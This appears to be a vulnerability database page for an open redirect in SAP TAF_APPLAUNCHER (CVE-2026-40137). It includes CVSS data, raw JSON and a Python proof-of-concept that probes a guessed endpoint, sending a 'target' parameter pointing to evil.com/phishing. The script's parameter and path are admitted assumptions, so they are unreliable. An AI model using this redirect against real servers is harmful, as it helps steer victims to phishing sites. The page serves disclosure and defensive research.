Security Vulnerability Report
中文
CVE-2026-40137 CVSS 6.1 MEDIUM

CVE-2026-40137

Published: 2026-05-12 03:16:13
Last Modified: 2026-05-12 03:16:13
Source: [email protected]

Description

SAP TAF_APPLAUNCHER within Business Server Pages allows an unauthenticated attacker to craft malicious links that, when clicked by a victim, redirects them to attacker?controlled sites, potentially exposing or altering sensitive information in the victim�s browser. This results in a low impact on confidentiality and integrity, with no impact on the availability of the application.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP TAF_APPLAUNCHER (具体受影响版本请参考 SAP Note 3727717)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-40137 # This script demonstrates the open redirect vulnerability. # Note: The actual parameter name may vary depending on the specific SAP configuration. import requests def check_open_redirect(target_host, malicious_url): # Common parameters for redirects in SAP applications might include 'target', 'url', 'redirect_url', etc. # This example assumes a parameter named 'target'. payload = { 'target': malicious_url } # Construct the full vulnerable endpoint URL # Based on the CVE, the component is TAF_APPLAUNCHER vuln_endpoint = f"{target_host}/sap/bc/bsp/sap/taf_applauncher/" try: print(f"[*] Testing endpoint: {vuln_endpoint}") response = requests.get(vuln_endpoint, params=payload, allow_redirects=False, timeout=10) # Check for HTTP 302 Found or 301 Moved Permanently status codes if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location') if location and malicious_url in location: print(f"[+] Vulnerability Confirmed!") print(f"[+] Server redirected to: {location}") return True print(f"[-] Not vulnerable or parameter incorrect. Status: {response.status_code}") return False except Exception as e: print(f"[!] Error during request: {e}") return False if __name__ == "__main__": target = "http://vulnerable-sap-server.example.com" evil_site = "http://evil.com/phishing" check_open_redirect(target, evil_site)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40137", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:12.693", "lastModified": "2026-05-12T03:16:12.693", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP TAF_APPLAUNCHER within Business Server Pages allows an unauthenticated attacker to craft malicious links that, when clicked by a victim, redirects them to attacker?controlled sites, potentially exposing or altering sensitive information in the victim�s browser. This results in a low impact on confidentiality and integrity, with no impact on the availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://me.sap.com/notes/3727717", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.